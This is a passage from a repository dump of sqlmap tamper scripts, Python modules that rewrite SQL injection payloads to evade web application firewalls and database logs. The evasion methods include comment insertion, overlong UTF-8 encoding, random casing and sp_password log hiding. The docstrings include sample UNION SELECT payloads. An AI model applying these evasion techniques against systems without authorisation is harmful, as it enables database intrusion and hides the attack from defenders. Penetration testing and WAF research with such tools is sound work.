36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1'\n    \"\"\"\n\n    hints = kwargs.get(\"hints\", {})\n    delimiter = kwargs.get(\"delimiter\", DEFAULT_GET_POST_DELIMITER)\n\n    hints[HINT.PREPEND] = delimiter.join(\"%s=\" % \"\".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(500))\n\n    return payload\n"
  },
  {
    "path": "sqlmap/tamper/misunion.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces instances of UNION with -.1UNION\n\n    Requirement:\n        * MySQL\n\n    Notes:\n        * Reference: https://raw.githubusercontent.com/y0unge/Notes/master/SQL%20Injection%20WAF%20Bypassing%20shortcut.pdf\n\n    >>> tamper('1 UNION ALL SELECT')\n    '1-.1UNION ALL SELECT'\n    >>> tamper('1\" UNION ALL SELECT')\n    '1\"-.1UNION ALL SELECT'\n    \"\"\"\n\n    return re.sub(r\"(?i)\\s+(UNION )\", r\"-.1\\g<1>\", payload) if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/modsecurityversioned.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import randomInt\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHER\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Embraces complete query with (MySQL) versioned comment\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 5.0\n\n    Notes:\n        * Useful to bypass ModSecurity WAF\n\n    >>> import random\n    >>> random.seed(0)\n    >>> tamper('1 AND 2>1--')\n    '1 /*!30963AND 2>1*/--'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        postfix = ''\n        for comment in ('#', '--', '/*'):\n            if comment in payload:\n                postfix = payload[payload.find(comment):]\n                payload = payload[:payload.find(comment)]\n                break\n        if ' ' in payload:\n            retVal = \"%s /*!30%s%s*/%s\" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/modsecurityzeroversioned.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHER\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Embraces complete query with (MySQL) zero-versioned comment\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 5.0\n\n    Notes:\n        * Useful to bypass ModSecurity WAF\n\n    >>> tamper('1 AND 2>1--')\n    '1 /*!00000AND 2>1*/--'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        postfix = ''\n        for comment in ('#', '--', '/*'):\n            if comment in payload:\n                postfix = payload[payload.find(comment):]\n                payload = payload[:payload.find(comment)]\n                break\n        if ' ' in payload:\n            retVal = \"%s /*!00000%s*/%s\" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/multiplespaces.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport random\nimport re\n\nfrom lib.core.data import kb\nfrom lib.core.datatype import OrderedSet\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Adds multiple spaces (' ') around SQL keywords\n\n    Notes:\n        * Useful to bypass very weak and bespoke web application firewalls\n          that has poorly written permissive regular expressions\n\n    Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt\n\n    >>> random.seed(0)\n    >>> tamper('1 UNION SELECT foobar')\n    '1     UNION     SELECT     foobar'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        words = OrderedSet()\n\n        for match in re.finditer(r\"\\b[A-Za-z_]+\\b\", payload):\n            word = match.group()\n\n            if word.upper() in kb.keywords:\n                words.add(word)\n\n        for word in words:\n            retVal = re.sub(r\"(?<=\\W)%s(?=[^A-Za-z_(]|\\Z)\" % word, \"%s%s%s\" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal)\n            retVal = re.sub(r\"(?<=\\W)%s(?=[(])\" % word, \"%s%s\" % (' ' * random.randint(1, 4), word), retVal)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/ord2ascii.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces ORD() occurences with equivalent ASCII() calls \n\n    Requirement:\n        * MySQL\n\n    >>> tamper(\"ORD('42')\")\n    \"ASCII('42')\"\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"(?i)\\bORD\\(\", \"ASCII(\", payload)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/overlongutf8.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport string\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOWEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)\n\n    Reference:\n        * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/\n        * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/\n\n    >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')\n    'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        i = 0\n\n        while i < len(payload):\n            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:\n                retVal += payload[i:i + 3]\n                i += 3\n            else:\n                if payload[i] not in (string.ascii_letters + string.digits):\n                    retVal += \"%%%.2X%%%.2X\" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))\n                else:\n                    retVal += payload[i]\n                i += 1\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/overlongutf8more.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport string\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOWEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)\n\n    Reference:\n        * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/\n        * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/\n\n    >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')\n    '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        i = 0\n\n        while i < len(payload):\n            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:\n                retVal += payload[i:i + 3]\n                i += 3\n            else:\n                retVal += \"%%%.2X%%%.2X\" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f))\n                i += 1\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/percentage.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport string\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against ASP web applications\" % os.path.basename(__file__).split(\".\")[0])\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)\n\n    Requirement:\n        * ASP\n\n    Tested against:\n        * Microsoft SQL Server 2000, 2005\n        * MySQL 5.1.56, 5.5.11\n        * PostgreSQL 9.0\n\n    Notes:\n        * Useful to bypass weak and bespoke web application firewalls\n\n    >>> tamper('SELECT FIELD FROM TABLE')\n    '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'\n    \"\"\"\n\n    if payload:\n        retVal = \"\"\n        i = 0\n\n        while i < len(payload):\n            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:\n                retVal += payload[i:i + 3]\n                i += 3\n            elif payload[i] != ' ':\n                retVal += '%%%s' % payload[i]\n                i += 1\n            else:\n                retVal += payload[i]\n                i += 1\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/plus2concat.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import zeroDepthSearch\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MSSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart\n\n    Tested against:\n        * Microsoft SQL Server 2012\n\n    Requirements:\n        * Microsoft SQL Server 2012+\n\n    Notes:\n        * Useful in case ('+') character is filtered\n\n    >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')\n    'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'\n\n    >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')\n    '1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        match = re.search(r\"('[^']+'|CHAR\\(\\d+\\))\\+.*(?<=\\+)('[^']+'|CHAR\\(\\d+\\))\", retVal)\n        if match:\n            part = match.group(0)\n\n            chars = [char for char in part]\n            for index in zeroDepthSearch(part, '+'):\n                chars[index] = ','\n\n            replacement = \"CONCAT(%s)\" % \"\".join(chars)\n            retVal = retVal.replace(part, replacement)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/plus2fnconcat.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import zeroDepthSearch\nfrom lib.core.compat import xrange\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MSSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart\n\n    Tested against:\n        * Microsoft SQL Server 2008\n\n    Requirements:\n        * Microsoft SQL Server 2008+\n\n    Notes:\n        * Useful in case ('+') character is filtered\n        * https://msdn.microsoft.com/en-us/library/bb630290.aspx\n\n    >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')\n    'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'\n\n    >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')\n    '1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        match = re.search(r\"('[^']+'|CHAR\\(\\d+\\))\\+.*(?<=\\+)('[^']+'|CHAR\\(\\d+\\))\", retVal)\n        if match:\n            old = match.group(0)\n            parts = []\n            last = 0\n\n            for index in zeroDepthSearch(old, '+'):\n                parts.append(old[last:index].strip('+'))\n                last = index\n\n            parts.append(old[last:].strip('+'))\n            replacement = parts[0]\n\n            for i in xrange(1, len(parts)):\n                replacement = \"{fn CONCAT(%s,%s)}\" % (replacement, parts[i])\n\n            retVal = retVal.replace(old, replacement)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/randomcase.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import randomRange\nfrom lib.core.compat import xrange\nfrom lib.core.data import kb\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)\n\n    Tested against:\n        * Microsoft SQL Server 2005\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n        * SQLite 3\n\n    Notes:\n        * Useful to bypass very weak and bespoke web application firewalls\n          that has poorly written permissive regular expressions\n        * This tamper script should work against all (?) databases\n\n    >>> import random\n    >>> random.seed(0)\n    >>> tamper('INSERT')\n    'InSeRt'\n    >>> tamper('f()')\n    'f()'\n    >>> tamper('function()')\n    'FuNcTiOn()'\n    >>> tamper('SELECT id FROM `user`')\n    'SeLeCt id FrOm `user`'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        for match in re.finditer(r\"\\b[A-Za-z_]{2,}\\b\", retVal):\n            word = match.group()\n\n            if (word.upper() in kb.keywords and re.search(r\"(?i)[`\\\"'\\[]%s[`\\\"'\\]]\" % word, retVal) is None) or (\"%s(\" % word) in payload:\n                while True:\n                    _ = \"\"\n\n                    for i in xrange(len(word)):\n                        _ += word[i].upper() if randomRange(0, 1) else word[i].lower()\n\n                    if len(_) > 1 and _ not in (_.lower(), _.upper()):\n                        break\n\n                retVal = retVal.replace(word, _)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/randomcomments.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import randomRange\nfrom lib.core.compat import xrange\nfrom lib.core.data import kb\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Add random inline comments inside SQL keywords (e.g. SELECT -> S/**/E/**/LECT)\n\n    >>> import random\n    >>> random.seed(0)\n    >>> tamper('INSERT')\n    'I/**/NS/**/ERT'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        for match in re.finditer(r\"\\b[A-Za-z_]+\\b\", payload):\n            word = match.group()\n\n            if len(word) < 2:\n                continue\n\n            if word.upper() in kb.keywords:\n                _ = word[0]\n\n                for i in xrange(1, len(word) - 1):\n                    _ += \"%s%s\" % (\"/**/\" if randomRange(0, 1) else \"\", word[i])\n\n                _ += word[-1]\n\n                if \"/**/\" not in _:\n                    index = randomRange(1, len(word) - 1)\n                    _ = word[:index] + \"/**/\" + word[index:]\n\n                retVal = retVal.replace(word, _)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/schemasplit.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')\n\n    Requirement:\n        * MySQL\n\n    Notes:\n        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf\n\n    >>> tamper('SELECT id FROM testdb.users')\n    'SELECT id FROM testdb 9.e.users'\n    \"\"\"\n\n    return re.sub(r\"(?i)( FROM \\w+)\\.(\\w+)\", r\"\\g<1> 9.e.\\g<2>\", payload) if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/sleep2getlock.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import kb\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces instances like 'SLEEP(5)' with (e.g.) \"GET_LOCK('ETgP',5)\"\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 5.0 and 5.5\n\n    Notes:\n        * Useful to bypass very weak and bespoke web application firewalls\n          that filter the SLEEP() and BENCHMARK() functions\n\n        * Reference: https://zhuanlan.zhihu.com/p/35245598\n\n    >>> tamper('SLEEP(5)') == \"GET_LOCK('%s',5)\" % kb.aliasName\n    True\n    \"\"\"\n\n    if payload:\n        payload = payload.replace(\"SLEEP(\", \"GET_LOCK('%s',\" % kb.aliasName)\n\n    return payload\n"
  },
  {
    "path": "sqlmap/tamper/sp_password.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGH\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs\n\n    Requirement:\n        * MSSQL\n\n    Notes:\n        * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure\n        * Reference: http://websec.ca/kb/sql_injection\n\n    >>> tamper('1 AND 9227=9227-- ')\n    '1 AND 9227=9227-- sp_password'\n    \"\"\"\n\n    retVal = \"\"\n\n    if payload:\n        retVal = \"%s%ssp_password\" % (payload, \"-- \" if not any(_ if _ in payload else None for _ in ('#', \"-- \")) else \"\")\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2comment.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces space character (' ') with comments '/**/'\n\n    Tested against:\n        * Microsoft SQL Server 2005\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n\n    Notes:\n        * Useful to bypass weak and bespoke web application firewalls\n\n    >>> tamper('SELECT id FROM users')\n    'SELECT/**/id/**/FROM/**/users'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        quote, doublequote, firstspace = False, False, False\n\n        for i in xrange(len(payload)):\n            if not firstspace:\n                if payload[i].isspace():\n                    firstspace = True\n                    retVal += \"/**/\"\n                    continue\n\n            elif payload[i] == '\\'':\n                quote = not quote\n\n            elif payload[i] == '\"':\n                doublequote = not doublequote\n\n            elif payload[i] == \" \" and not doublequote and not quote:\n                retVal += \"/**/\"\n                continue\n\n            retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2dash.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport random\nimport string\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\\n')\n\n    Requirement:\n        * MSSQL\n        * SQLite\n\n    Notes:\n        * Useful to bypass several web application firewalls\n        * Used during the ZeroNights SQL injection challenge,\n          https://proton.onsec.ru/contest/\n\n    >>> random.seed(0)\n    >>> tamper('1 AND 9227=9227')\n    '1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'\n    \"\"\"\n\n    retVal = \"\"\n\n    if payload:\n        for i in xrange(len(payload)):\n            if payload[i].isspace():\n                randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))\n                retVal += \"--%s%%0A\" % randomStr\n            elif payload[i] == '#' or payload[i:i + 3] == '-- ':\n                retVal += payload[i:]\n                break\n            else:\n                retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2hash.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport random\nimport string\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\\n')\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 4.0, 5.0\n\n    Notes:\n        * Useful to bypass several web application firewalls\n        * Used during the ModSecurity SQL injection challenge,\n          http://modsecurity.org/demo/challenge.html\n\n    >>> random.seed(0)\n    >>> tamper('1 AND 9227=9227')\n    '1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'\n    \"\"\"\n\n    retVal = \"\"\n\n    if payload:\n        for i in xrange(len(payload)):\n            if payload[i].isspace():\n                randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12)))\n                retVal += \"%%23%s%%0A\" % randomStr\n            elif payload[i] == '#' or payload[i:i + 3] == '-- ':\n                retVal += payload[i:]\n                break\n            else:\n                retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2morecomment.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces (MySQL) instances of space character (' ') with comments '/**_**/'\n\n    Tested against:\n        * MySQL 5.0 and 5.5\n\n    Notes:\n        * Useful to bypass weak and bespoke web application firewalls\n\n    >>> tamper('SELECT id FROM users')\n    'SELECT/**_**/id/**_**/FROM/**_**/users'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        quote, doublequote, firstspace = False, False, False\n\n        for i in xrange(len(payload)):\n            if not firstspace:\n                if payload[i].isspace():\n                    firstspace = True\n                    retVal += \"/**_**/\"\n                    continue\n\n            elif payload[i] == '\\'':\n                quote = not quote\n\n            elif payload[i] == '\"':\n                doublequote = not doublequote\n\n            elif payload[i] == \" \" and not doublequote and not quote:\n                retVal += \"/**_**/\"\n                continue\n\n            retVal += payload[i]\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/space2morehash.py",
